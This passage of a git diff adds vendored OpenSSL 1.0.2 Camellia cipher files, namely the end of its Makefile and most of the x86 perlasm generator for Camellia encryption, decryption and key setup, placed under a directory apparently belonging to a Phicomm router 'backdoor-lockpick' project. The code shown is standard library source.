+LIBOBJ= cmll_ecb.o cmll_ofb.o cmll_cfb.o cmll_ctr.o cmll_utl.o $(CMLL_ENC)
+
+SRC= $(LIBSRC)
+
+EXHEADER= camellia.h
+HEADER= cmll_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+cmll-x86.s:	asm/cmll-x86.pl ../perlasm/x86asm.pl
+	$(PERL) asm/cmll-x86.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+cmll-x86_64.s:  asm/cmll-x86_64.pl
+	$(PERL) asm/cmll-x86_64.pl $(PERLASM_SCHEME) > $@
+cmllt4-sparcv9.s: asm/cmllt4-sparcv9.pl
+	$(PERL) asm/cmllt4-sparcv9.pl $(CFLAGS) > $@
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+camellia.o: ../../include/openssl/opensslconf.h camellia.c camellia.h
+camellia.o: cmll_locl.h
+cmll_cbc.o: ../../include/openssl/camellia.h ../../include/openssl/modes.h
+cmll_cbc.o: ../../include/openssl/opensslconf.h cmll_cbc.c
+cmll_cfb.o: ../../include/openssl/camellia.h ../../include/openssl/modes.h
+cmll_cfb.o: ../../include/openssl/opensslconf.h cmll_cfb.c
+cmll_ctr.o: ../../include/openssl/camellia.h ../../include/openssl/modes.h
+cmll_ctr.o: ../../include/openssl/opensslconf.h cmll_ctr.c
+cmll_ecb.o: ../../include/openssl/camellia.h
+cmll_ecb.o: ../../include/openssl/opensslconf.h cmll_ecb.c cmll_locl.h
+cmll_misc.o: ../../include/openssl/camellia.h ../../include/openssl/crypto.h
+cmll_misc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+cmll_misc.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cmll_misc.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+cmll_misc.o: ../../include/openssl/symhacks.h cmll_locl.h cmll_misc.c
+cmll_ofb.o: ../../include/openssl/camellia.h ../../include/openssl/modes.h
+cmll_ofb.o: ../../include/openssl/opensslconf.h cmll_ofb.c
+cmll_utl.o: ../../include/openssl/camellia.h ../../include/openssl/crypto.h
+cmll_utl.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+cmll_utl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cmll_utl.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+cmll_utl.o: ../../include/openssl/symhacks.h cmll_locl.h cmll_utl.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/asm/cmll-x86.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/asm/cmll-x86.pl
new file mode 100644
index 0000000..c314d62
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/asm/cmll-x86.pl
@@ -0,0 +1,1138 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Copyright (c) 2008 Andy Polyakov <appro@openssl.org>
+#
+# This module may be used under the terms of either the GNU General
+# Public License version 2 or later, the GNU Lesser General Public
+# License version 2.1 or later, the Mozilla Public License version
+# 1.1 or the BSD License. The exact terms of either license are
+# distributed along with this module. For further details see
+# http://www.openssl.org/~appro/camellia/.
+# ====================================================================
+
+# Performance in cycles per processed byte (less is better) in
+# 'openssl speed ...' benchmark:
+#
+#			AMD K8	Core2	PIII	P4
+# -evp camellia-128-ecb	21.5	22.8	27.0	28.9
+# + over gcc 3.4.6	+90/11% +70/10%	+53/4%	+160/64%
+# + over icc 8.0	+48/19% +21/15%	+21/17%	+55/37%
+#
+# camellia-128-cbc	17.3	21.1	23.9	25.9
+#
+# 128-bit key setup	196	280	256	240	cycles/key
+# + over gcc 3.4.6	+30/0%	+17/11%	+11/0%	+63/40%
+# + over icc 8.0	+18/3%	+10/0%	+10/3%	+21/10%
+#
+# Pairs of numbers in "+" rows represent performance improvement over
+# compiler generated position-independent code, PIC, and non-PIC
+# respectively. PIC results are of greater relevance, as this module
+# is position-independent, i.e. suitable for a shared library or PIE.
+# Position independence "costs" one register, which is why compilers
+# are so close with non-PIC results, they have an extra register to
+# spare. CBC results are better than ECB ones thanks to "zero-copy"
+# private _x86_* interface, and are ~30-40% better than with compiler
+# generated cmll_cbc.o, and reach ~80-90% of x86_64 performance on
+# same CPU (where applicable).
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "x86asm.pl";
+
+$OPENSSL=1;
+
+&asm_init($ARGV[0],"cmll-586.pl",$ARGV[$#ARGV] eq "386");
+
+@T=("eax","ebx","ecx","edx");
+$idx="esi";
+$key="edi";
+$Tbl="ebp";
+
+# stack frame layout in _x86_Camellia_* routines, frame is allocated
+# by caller
+$__ra=&DWP(0,"esp");	# return address
+$__s0=&DWP(4,"esp");	# s0 backing store
+$__s1=&DWP(8,"esp");	# s1 backing store
+$__s2=&DWP(12,"esp");	# s2 backing store
+$__s3=&DWP(16,"esp");	# s3 backing store
+$__end=&DWP(20,"esp");	# pointer to end/start of key schedule
+
+# stack frame layout in Camellia_[en|crypt] routines, which differs from
+# above by 4 and overlaps by pointer to end/start of key schedule
+$_end=&DWP(16,"esp");
+$_esp=&DWP(20,"esp");
+
+# const unsigned int Camellia_SBOX[4][256];
+# Well, sort of... Camellia_SBOX[0][] is interleaved with [1][],
+# and [2][] - with [3][]. This is done to optimize code size.
+$SBOX1_1110=0;		# Camellia_SBOX[0]
+$SBOX4_4404=4;		# Camellia_SBOX[1]
+$SBOX2_0222=2048;	# Camellia_SBOX[2]
+$SBOX3_3033=2052;	# Camellia_SBOX[3]
+&static_label("Camellia_SIGMA");
+&static_label("Camellia_SBOX");
+
+sub Camellia_Feistel {
+my $i=@_[0];
+my $seed=defined(@_[1])?@_[1]:0;
+my $scale=$seed<0?-8:8;
+my $frame=defined(@_[2])?@_[2]:0;
+my $j=($i&1)*2;
+my $t0=@T[($j)%4],$t1=@T[($j+1)%4],$t2=@T[($j+2)%4],$t3=@T[($j+3)%4];
+
+	&xor	($t0,$idx);				# t0^=key[0]
+	&xor	($t1,&DWP($seed+$i*$scale+4,$key));	# t1^=key[1]
+	&movz	($idx,&HB($t0));			# (t0>>8)&0xff
+	&mov	($t3,&DWP($SBOX3_3033,$Tbl,$idx,8));	# t3=SBOX3_3033[0]
+	&movz	($idx,&LB($t0));			# (t0>>0)&0xff
+	&xor	($t3,&DWP($SBOX4_4404,$Tbl,$idx,8));	# t3^=SBOX4_4404[0]
+	&shr	($t0,16);
+	&movz	($idx,&LB($t1));			# (t1>>0)&0xff
+	&mov	($t2,&DWP($SBOX1_1110,$Tbl,$idx,8));	# t2=SBOX1_1110[1]
+	&movz	($idx,&HB($t0));			# (t0>>24)&0xff
+	&xor	($t3,&DWP($SBOX1_1110,$Tbl,$idx,8));	# t3^=SBOX1_1110[0]
+	&movz	($idx,&HB($t1));			# (t1>>8)&0xff
+	&xor	($t2,&DWP($SBOX4_4404,$Tbl,$idx,8));	# t2^=SBOX4_4404[1]
+	&shr	($t1,16);
+	&movz	($t0,&LB($t0));				# (t0>>16)&0xff
+	&xor	($t3,&DWP($SBOX2_0222,$Tbl,$t0,8));	# t3^=SBOX2_0222[0]
+	&movz	($idx,&HB($t1));			# (t1>>24)&0xff
+	&mov	($t0,&DWP($frame+4*(($j+3)%4),"esp"));	# prefetch "s3"
+	&xor	($t2,$t3);				# t2^=t3
+	&rotr	($t3,8);				# t3=RightRotate(t3,8)
+	&xor	($t2,&DWP($SBOX2_0222,$Tbl,$idx,8));	# t2^=SBOX2_0222[1]
+	&movz	($idx,&LB($t1));			# (t1>>16)&0xff
+	&mov	($t1,&DWP($frame+4*(($j+2)%4),"esp"));	# prefetch "s2"
+	&xor	($t3,$t0);				# t3^=s3
+	&xor	($t2,&DWP($SBOX3_3033,$Tbl,$idx,8));	# t2^=SBOX3_3033[1]
+	&mov	($idx,&DWP($seed+($i+1)*$scale,$key));	# prefetch key[i+1]
+	&xor	($t3,$t2);				# t3^=t2
+	&mov	(&DWP($frame+4*(($j+3)%4),"esp"),$t3);	# s3=t3
+	&xor	($t2,$t1);				# t2^=s2
+	&mov	(&DWP($frame+4*(($j+2)%4),"esp"),$t2);	# s2=t2
+}
+
+# void Camellia_EncryptBlock_Rounds(
+#		int grandRounds,
+#		const Byte plaintext[],
+#		const KEY_TABLE_TYPE keyTable,
+#		Byte ciphertext[])
+&function_begin("Camellia_EncryptBlock_Rounds");
+	&mov	("eax",&wparam(0));	# load grandRounds
+	&mov	($idx,&wparam(1));	# load plaintext pointer
+	&mov	($key,&wparam(2));	# load key schedule pointer
+
+	&mov	("ebx","esp");
+	&sub	("esp",7*4);		# place for s[0-3],keyEnd,esp and ra
+	&and	("esp",-64);
+
+	# place stack frame just "above mod 1024" the key schedule
+	# this ensures that cache associativity of 2 suffices
+	&lea	("ecx",&DWP(-64-63,$key));
+	&sub	("ecx","esp");
+	&neg	("ecx");
+	&and	("ecx",0x3C0);	# modulo 1024, but aligned to cache-line
+	&sub	("esp","ecx");
+	&add	("esp",4);	# 4 is reserved for callee's return address
+
+	&shl	("eax",6);
+	&lea	("eax",&DWP(0,$key,"eax"));
+	&mov	($_esp,"ebx");	# save %esp
+	&mov	($_end,"eax");	# save keyEnd
+
+	&call	(&label("pic_point"));
+	&set_label("pic_point");
+	&blindpop($Tbl);
+	&lea	($Tbl,&DWP(&label("Camellia_SBOX")."-".&label("pic_point"),$Tbl));
+
+	&mov	(@T[0],&DWP(0,$idx));	# load plaintext
+	&mov	(@T[1],&DWP(4,$idx));
+	&mov	(@T[2],&DWP(8,$idx));
+	&bswap	(@T[0]);
+	&mov	(@T[3],&DWP(12,$idx));
+	&bswap	(@T[1]);
+	&bswap	(@T[2]);
+	&bswap	(@T[3]);
+
+	&call	("_x86_Camellia_encrypt");
+
+	&mov	("esp",$_esp);
+	&bswap	(@T[0]);
+	&mov	($idx,&wparam(3));	# load ciphertext pointer
+	&bswap	(@T[1]);
+	&bswap	(@T[2]);
+	&bswap	(@T[3]);
+	&mov	(&DWP(0,$idx),@T[0]);	# write ciphertext
+	&mov	(&DWP(4,$idx),@T[1]);
+	&mov	(&DWP(8,$idx),@T[2]);
+	&mov	(&DWP(12,$idx),@T[3]);
+&function_end("Camellia_EncryptBlock_Rounds");
+# V1.x API
+&function_begin_B("Camellia_EncryptBlock");
+	&mov	("eax",128);
+	&sub	("eax",&wparam(0));	# load keyBitLength
+	&mov	("eax",3);
+	&adc	("eax",0);		# keyBitLength==128?3:4
+	&mov	(&wparam(0),"eax");
+	&jmp	(&label("Camellia_EncryptBlock_Rounds"));
+&function_end_B("Camellia_EncryptBlock");
+
+if ($OPENSSL) {
+# void Camellia_encrypt(
+#		const unsigned char *in,
+#		unsigned char *out,
+#		const CAMELLIA_KEY *key)
+&function_begin("Camellia_encrypt");
+	&mov	($idx,&wparam(0));	# load plaintext pointer
+	&mov	($key,&wparam(2));	# load key schedule pointer
+
+	&mov	("ebx","esp");
+	&sub	("esp",7*4);		# place for s[0-3],keyEnd,esp and ra
+	&and	("esp",-64);
+	&mov	("eax",&DWP(272,$key));	# load grandRounds counter
+
+	# place stack frame just "above mod 1024" the key schedule
+	# this ensures that cache associativity of 2 suffices
+	&lea	("ecx",&DWP(-64-63,$key));
+	&sub	("ecx","esp");
+	&neg	("ecx");
+	&and	("ecx",0x3C0);	# modulo 1024, but aligned to cache-line
+	&sub	("esp","ecx");
+	&add	("esp",4);	# 4 is reserved for callee's return address
+
+	&shl	("eax",6);
+	&lea	("eax",&DWP(0,$key,"eax"));
+	&mov	($_esp,"ebx");	# save %esp
+	&mov	($_end,"eax");	# save keyEnd
+
+	&call	(&label("pic_point"));
+	&set_label("pic_point");
+	&blindpop($Tbl);
+	&lea	($Tbl,&DWP(&label("Camellia_SBOX")."-".&label("pic_point"),$Tbl));
+
+	&mov	(@T[0],&DWP(0,$idx));	# load plaintext
+	&mov	(@T[1],&DWP(4,$idx));
+	&mov	(@T[2],&DWP(8,$idx));
+	&bswap	(@T[0]);
+	&mov	(@T[3],&DWP(12,$idx));
+	&bswap	(@T[1]);
+	&bswap	(@T[2]);
+	&bswap	(@T[3]);
+
+	&call	("_x86_Camellia_encrypt");
+
+	&mov	("esp",$_esp);
+	&bswap	(@T[0]);
+	&mov	($idx,&wparam(1));	# load ciphertext pointer
+	&bswap	(@T[1]);
+	&bswap	(@T[2]);
+	&bswap	(@T[3]);
+	&mov	(&DWP(0,$idx),@T[0]);	# write ciphertext
+	&mov	(&DWP(4,$idx),@T[1]);
+	&mov	(&DWP(8,$idx),@T[2]);
+	&mov	(&DWP(12,$idx),@T[3]);
+&function_end("Camellia_encrypt");
+}
+
+&function_begin_B("_x86_Camellia_encrypt");
+	&xor	(@T[0],&DWP(0,$key));	# ^=key[0-3]
+	&xor	(@T[1],&DWP(4,$key));
+	&xor	(@T[2],&DWP(8,$key));
+	&xor	(@T[3],&DWP(12,$key));
+	&mov	($idx,&DWP(16,$key));	# prefetch key[4]
+
+	&mov	($__s0,@T[0]);		# save s[0-3]
+	&mov	($__s1,@T[1]);
+	&mov	($__s2,@T[2]);
+	&mov	($__s3,@T[3]);
+
+&set_label("loop",16);
+	for ($i=0;$i<6;$i++) { Camellia_Feistel($i,16,4); }
+
+	&add	($key,16*4);
+	&cmp	($key,$__end);
+	&je	(&label("done"));
+
+	# @T[0-1] are preloaded, $idx is preloaded with key[0]
+	&and	($idx,@T[0]);
+	 &mov	 (@T[3],$__s3);
+	&rotl	($idx,1);
+	 &mov	 (@T[2],@T[3]);
+	&xor	(@T[1],$idx);
+	 &or	 (@T[2],&DWP(12,$key));
+	&mov	($__s1,@T[1]);		# s1^=LeftRotate(s0&key[0],1);
+	 &xor	 (@T[2],$__s2);
+
+	&mov	($idx,&DWP(4,$key));
+	 &mov	 ($__s2,@T[2]);		# s2^=s3|key[3];
+	&or	($idx,@T[1]);
+	 &and	 (@T[2],&DWP(8,$key));
+	&xor	(@T[0],$idx);
+	 &rotl	 (@T[2],1);
+	&mov	($__s0,@T[0]);		# s0^=s1|key[1];
+	 &xor	 (@T[3],@T[2]);
+	&mov	($idx,&DWP(16,$key));		# prefetch key[4]
+	 &mov	 ($__s3,@T[3]);		# s3^=LeftRotate(s2&key[2],1);
+	&jmp	(&label("loop"));
+
+&set_label("done",8);
+	&mov	(@T[2],@T[0]);		# SwapHalf
+	&mov	(@T[3],@T[1]);
+	&mov	(@T[0],$__s2);
+	&mov	(@T[1],$__s3);
+	&xor	(@T[0],$idx);		# $idx is preloaded with key[0]
+	&xor	(@T[1],&DWP(4,$key));
+	&xor	(@T[2],&DWP(8,$key));
+	&xor	(@T[3],&DWP(12,$key));
+	&ret	();
+&function_end_B("_x86_Camellia_encrypt");
+
+# void Camellia_DecryptBlock_Rounds(
+#		int grandRounds,
+#		const Byte ciphertext[],
+#		const KEY_TABLE_TYPE keyTable,
+#		Byte plaintext[])
+&function_begin("Camellia_DecryptBlock_Rounds");
+	&mov	("eax",&wparam(0));	# load grandRounds
+	&mov	($idx,&wparam(1));	# load ciphertext pointer
+	&mov	($key,&wparam(2));	# load key schedule pointer
+
+	&mov	("ebx","esp");
+	&sub	("esp",7*4);		# place for s[0-3],keyEnd,esp and ra
+	&and	("esp",-64);
+
+	# place stack frame just "above mod 1024" the key schedule
+	# this ensures that cache associativity of 2 suffices
+	&lea	("ecx",&DWP(-64-63,$key));
+	&sub	("ecx","esp");
+	&neg	("ecx");
+	&and	("ecx",0x3C0);	# modulo 1024, but aligned to cache-line
+	&sub	("esp","ecx");
+	&add	("esp",4);	# 4 is reserved for callee's return address
+
+	&shl	("eax",6);
+	&mov	(&DWP(4*4,"esp"),$key);	# save keyStart
+	&lea	($key,&DWP(0,$key,"eax"));
+	&mov	(&DWP(5*4,"esp"),"ebx");# save %esp
+
+	&call	(&label("pic_point"));
+	&set_label("pic_point");
+	&blindpop($Tbl);
+	&lea	($Tbl,&DWP(&label("Camellia_SBOX")."-".&label("pic_point"),$Tbl));
+
+	&mov	(@T[0],&DWP(0,$idx));	# load ciphertext
+	&mov	(@T[1],&DWP(4,$idx));
+	&mov	(@T[2],&DWP(8,$idx));
+	&bswap	(@T[0]);
+	&mov	(@T[3],&DWP(12,$idx));
+	&bswap	(@T[1]);
+	&bswap	(@T[2]);
+	&bswap	(@T[3]);
+
+	&call	("_x86_Camellia_decrypt");
+
+	&mov	("esp",&DWP(5*4,"esp"));
+	&bswap	(@T[0]);
+	&mov	($idx,&wparam(3));	# load plaintext pointer
+	&bswap	(@T[1]);
+	&bswap	(@T[2]);
+	&bswap	(@T[3]);
+	&mov	(&DWP(0,$idx),@T[0]);	# write plaintext
+	&mov	(&DWP(4,$idx),@T[1]);
+	&mov	(&DWP(8,$idx),@T[2]);
+	&mov	(&DWP(12,$idx),@T[3]);
+&function_end("Camellia_DecryptBlock_Rounds");
+# V1.x API
+&function_begin_B("Camellia_DecryptBlock");
+	&mov	("eax",128);
+	&sub	("eax",&wparam(0));	# load keyBitLength
+	&mov	("eax",3);
+	&adc	("eax",0);		# keyBitLength==128?3:4
+	&mov	(&wparam(0),"eax");
+	&jmp	(&label("Camellia_DecryptBlock_Rounds"));
+&function_end_B("Camellia_DecryptBlock");
+
+if ($OPENSSL) {
+# void Camellia_decrypt(
+#		const unsigned char *in,
+#		unsigned char *out,
+#		const CAMELLIA_KEY *key)
+&function_begin("Camellia_decrypt");
+	&mov	($idx,&wparam(0));	# load ciphertext pointer
+	&mov	($key,&wparam(2));	# load key schedule pointer
+
+	&mov	("ebx","esp");
+	&sub	("esp",7*4);		# place for s[0-3],keyEnd,esp and ra
+	&and	("esp",-64);
+	&mov	("eax",&DWP(272,$key));	# load grandRounds counter
+
+	# place stack frame just "above mod 1024" the key schedule
+	# this ensures that cache associativity of 2 suffices
+	&lea	("ecx",&DWP(-64-63,$key));
+	&sub	("ecx","esp");
+	&neg	("ecx");
+	&and	("ecx",0x3C0);	# modulo 1024, but aligned to cache-line
+	&sub	("esp","ecx");
+	&add	("esp",4);	# 4 is reserved for callee's return address
+
+	&shl	("eax",6);
+	&mov	(&DWP(4*4,"esp"),$key);	# save keyStart
+	&lea	($key,&DWP(0,$key,"eax"));
+	&mov	(&DWP(5*4,"esp"),"ebx");# save %esp
+
+	&call	(&label("pic_point"));
+	&set_label("pic_point");
+	&blindpop($Tbl);
+	&lea	($Tbl,&DWP(&label("Camellia_SBOX")."-".&label("pic_point"),$Tbl));
+
+	&mov	(@T[0],&DWP(0,$idx));	# load ciphertext
+	&mov	(@T[1],&DWP(4,$idx));
+	&mov	(@T[2],&DWP(8,$idx));
+	&bswap	(@T[0]);
+	&mov	(@T[3],&DWP(12,$idx));
+	&bswap	(@T[1]);
+	&bswap	(@T[2]);
+	&bswap	(@T[3]);
+
+	&call	("_x86_Camellia_decrypt");
+
+	&mov	("esp",&DWP(5*4,"esp"));
+	&bswap	(@T[0]);
+	&mov	($idx,&wparam(1));	# load plaintext pointer
+	&bswap	(@T[1]);
+	&bswap	(@T[2]);
+	&bswap	(@T[3]);
+	&mov	(&DWP(0,$idx),@T[0]);	# write plaintext
+	&mov	(&DWP(4,$idx),@T[1]);
+	&mov	(&DWP(8,$idx),@T[2]);
+	&mov	(&DWP(12,$idx),@T[3]);
+&function_end("Camellia_decrypt");
+}
+
+&function_begin_B("_x86_Camellia_decrypt");
+	&xor	(@T[0],&DWP(0,$key));	# ^=key[0-3]
+	&xor	(@T[1],&DWP(4,$key));
+	&xor	(@T[2],&DWP(8,$key));
+	&xor	(@T[3],&DWP(12,$key));
+	&mov	($idx,&DWP(-8,$key));	# prefetch key[-2]
+
+	&mov	($__s0,@T[0]);		# save s[0-3]
+	&mov	($__s1,@T[1]);
+	&mov	($__s2,@T[2]);
+	&mov	($__s3,@T[3]);
+
+&set_label("loop",16);
+	for ($i=0;$i<6;$i++) { Camellia_Feistel($i,-8,4); }
+
+	&sub	($key,16*4);
+	&cmp	($key,$__end);
+	&je	(&label("done"));
+
+	# @T[0-1] are preloaded, $idx is preloaded with key[2]
+	&and	($idx,@T[0]);
+	 &mov	 (@T[3],$__s3);
+	&rotl	($idx,1);
+	 &mov	 (@T[2],@T[3]);
+	&xor	(@T[1],$idx);
+	 &or	 (@T[2],&DWP(4,$key));
+	&mov	($__s1,@T[1]);		# s1^=LeftRotate(s0&key[0],1);
+	 &xor	 (@T[2],$__s2);
+
+	&mov	($idx,&DWP(12,$key));
+	 &mov	 ($__s2,@T[2]);		# s2^=s3|key[3];
+	&or	($idx,@T[1]);
+	 &and	 (@T[2],&DWP(0,$key));
+	&xor	(@T[0],$idx);
+	 &rotl	 (@T[2],1);
+	&mov	($__s0,@T[0]);		# s0^=s1|key[1];
+	 &xor	 (@T[3],@T[2]);
+	&mov	($idx,&DWP(-8,$key));	# prefetch key[4]
+	 &mov	 ($__s3,@T[3]);		# s3^=LeftRotate(s2&key[2],1);
+	&jmp	(&label("loop"));
+
+&set_label("done",8);
+	&mov	(@T[2],@T[0]);		# SwapHalf
+	&mov	(@T[3],@T[1]);
+	&mov	(@T[0],$__s2);
+	&mov	(@T[1],$__s3);
+	&xor	(@T[2],$idx);		# $idx is preloaded with key[2]
+	&xor	(@T[3],&DWP(12,$key));
+	&xor	(@T[0],&DWP(0,$key));
+	&xor	(@T[1],&DWP(4,$key));
+	&ret	();
+&function_end_B("_x86_Camellia_decrypt");
+
+# shld is very slow on Intel P4 family. Even on AMD it limits
+# instruction decode rate [because it's VectorPath] and consequently
+# performance. PIII, PM and Core[2] seem to be the only ones which
+# execute this code ~7% faster...
+sub __rotl128 {
+  my ($i0,$i1,$i2,$i3,$rot,$rnd,@T)=@_;
+
+    $rnd *= 2;
+    if ($rot) {
+	&mov	($idx,$i0);
+	&shld	($i0,$i1,$rot);
+	&shld	($i1,$i2,$rot);
+	&shld	($i2,$i3,$rot);
+	&shld	($i3,$idx,$rot);
+    }
+    &mov	(&DWP(-128+4*$rnd++,$key),shift(@T))	if ($i0 eq @T[0]);
+    &mov	(&DWP(-128+4*$rnd++,$key),shift(@T))	if ($i1 eq @T[0]);
+    &mov	(&DWP(-128+4*$rnd++,$key),shift(@T))	if ($i2 eq @T[0]);
+    &mov	(&DWP(-128+4*$rnd++,$key),shift(@T))	if ($i3 eq @T[0]);
+}
+
+# ... Implementing 128-bit rotate without shld gives >3x performance
+# improvement on P4, only ~7% degradation on other Intel CPUs and
+# not worse performance on AMD. This is therefore preferred.
+sub _rotl128 {
+  my ($i0,$i1,$i2,$i3,$rot,$rnd,@T)=@_;
+
+    $rnd *= 2;
+    if ($rot) {
+	&mov	($Tbl,$i0);
+	&shl	($i0,$rot);
+	&mov	($idx,$i1);
+	&shr	($idx,32-$rot);
+	&shl	($i1,$rot);
+	&or	($i0,$idx);
+	&mov	($idx,$i2);
+	&shl	($i2,$rot);
+	&mov	(&DWP(-128+4*$rnd++,$key),shift(@T))	if ($i0 eq @T[0]);
+	&shr	($idx,32-$rot);
+	&or	($i1,$idx);
+	&shr	($Tbl,32-$rot);
+	&mov	($idx,$i3);
+	&shr	($idx,32-$rot);
+	&mov	(&DWP(-128+4*$rnd++,$key),shift(@T))	if ($i1 eq @T[0]);
+	&shl	($i3,$rot);
+	&or	($i2,$idx);
+	&or	($i3,$Tbl);
+	&mov	(&DWP(-128+4*$rnd++,$key),shift(@T))	if ($i2 eq @T[0]);
+	&mov	(&DWP(-128+4*$rnd++,$key),shift(@T))	if ($i3 eq @T[0]);
+    } else {
+	&mov	(&DWP(-128+4*$rnd++,$key),shift(@T))	if ($i0 eq @T[0]);
+	&mov	(&DWP(-128+4*$rnd++,$key),shift(@T))	if ($i1 eq @T[0]);
+	&mov	(&DWP(-128+4*$rnd++,$key),shift(@T))	if ($i2 eq @T[0]);
+	&mov	(&DWP(-128+4*$rnd++,$key),shift(@T))	if ($i3 eq @T[0]);
+    }
+}
+
+sub _saveround {
+my ($rnd,$key,@T)=@_;
+my $bias=int(@T[0])?shift(@T):0;
+
+	&mov	(&DWP($bias+$rnd*8+0,$key),@T[0]);
+	&mov	(&DWP($bias+$rnd*8+4,$key),@T[1])	if ($#T>=1);
+	&mov	(&DWP($bias+$rnd*8+8,$key),@T[2])	if ($#T>=2);
+	&mov	(&DWP($bias+$rnd*8+12,$key),@T[3])	if ($#T>=3);
+}
+
+sub _loadround {
+my ($rnd,$key,@T)=@_;
+my $bias=int(@T[0])?shift(@T):0;
+
+	&mov	(@T[0],&DWP($bias+$rnd*8+0,$key));
+	&mov	(@T[1],&DWP($bias+$rnd*8+4,$key))	if ($#T>=1);
+	&mov	(@T[2],&DWP($bias+$rnd*8+8,$key))	if ($#T>=2);
+	&mov	(@T[3],&DWP($bias+$rnd*8+12,$key))	if ($#T>=3);
+}
+
+# void Camellia_Ekeygen(
+#		const int keyBitLength,
+#		const Byte *rawKey,
+#		KEY_TABLE_TYPE keyTable)
+&function_begin("Camellia_Ekeygen");
+{ my $step=0;
+
+	&stack_push(4);				# place for s[0-3]
+
+	&mov	($Tbl,&wparam(0));		# load arguments
+	&mov	($idx,&wparam(1));
+	&mov	($key,&wparam(2));
+
+	&mov	(@T[0],&DWP(0,$idx));		# load 0-127 bits
+	&mov	(@T[1],&DWP(4,$idx));
+	&mov	(@T[2],&DWP(8,$idx));
+	&mov	(@T[3],&DWP(12,$idx));
+
+	&bswap	(@T[0]);
+	&bswap	(@T[1]);
+	&bswap	(@T[2]);
+	&bswap	(@T[3]);
+
+	&_saveround	(0,$key,@T);		# KL<<<0
+
+	&cmp	($Tbl,128);
+	&je	(&label("1st128"));
+
+	&mov	(@T[0],&DWP(16,$idx));		# load 128-191 bits
+	&mov	(@T[1],&DWP(20,$idx));
+	&cmp	($Tbl,192);
+	&je	(&label("1st192"));
+	&mov	(@T[2],&DWP(24,$idx));		# load 192-255 bits
+	&mov	(@T[3],&DWP(28,$idx));
+	&jmp	(&label("1st256"));
+&set_label("1st192",4);
+	&mov	(@T[2],@T[0]);
+	&mov	(@T[3],@T[1]);
+	&not	(@T[2]);
+	&not	(@T[3]);
+&set_label("1st256",4);
+	&bswap	(@T[0]);
+	&bswap	(@T[1]);
+	&bswap	(@T[2]);
+	&bswap	(@T[3]);
+
+	&_saveround	(4,$key,@T);		# temporary storage for KR!
+
+	&xor	(@T[0],&DWP(0*8+0,$key));	# KR^KL
+	&xor	(@T[1],&DWP(0*8+4,$key));
+	&xor	(@T[2],&DWP(1*8+0,$key));
+	&xor	(@T[3],&DWP(1*8+4,$key));
+
+&set_label("1st128",4);
+	&call	(&label("pic_point"));
+	&set_label("pic_point");
+	&blindpop($Tbl);
+	&lea	($Tbl,&DWP(&label("Camellia_SBOX")."-".&label("pic_point"),$Tbl));
+	&lea	($key,&DWP(&label("Camellia_SIGMA")."-".&label("Camellia_SBOX"),$Tbl));
+
+	&mov	($idx,&DWP($step*8,$key));	# prefetch SIGMA[0]
+	&mov	(&swtmp(0),@T[0]);		# save s[0-3]
+	&mov	(&swtmp(1),@T[1]);
+	&mov	(&swtmp(2),@T[2]);
+	&mov	(&swtmp(3),@T[3]);
+	&Camellia_Feistel($step++);
+	&Camellia_Feistel($step++);
+	&mov	(@T[2],&swtmp(2));
+	&mov	(@T[3],&swtmp(3));
+
+	&mov	($idx,&wparam(2));
+	&xor	(@T[0],&DWP(0*8+0,$idx));	# ^KL
+	&xor	(@T[1],&DWP(0*8+4,$idx));
+	&xor	(@T[2],&DWP(1*8+0,$idx));
+	&xor	(@T[3],&DWP(1*8+4,$idx));
+
+	&mov	($idx,&DWP($step*8,$key));	# prefetch SIGMA[4]
+	&mov	(&swtmp(0),@T[0]);		# save s[0-3]
+	&mov	(&swtmp(1),@T[1]);
+	&mov	(&swtmp(2),@T[2]);
+	&mov	(&swtmp(3),@T[3]);
+	&Camellia_Feistel($step++);
+	&Camellia_Feistel($step++);
+	&mov	(@T[2],&swtmp(2));
+	&mov	(@T[3],&swtmp(3));
+
+	&mov	($idx,&wparam(0));
+	&cmp	($idx,128);
+	&jne	(&label("2nd256"));
+
+	&mov	($key,&wparam(2));
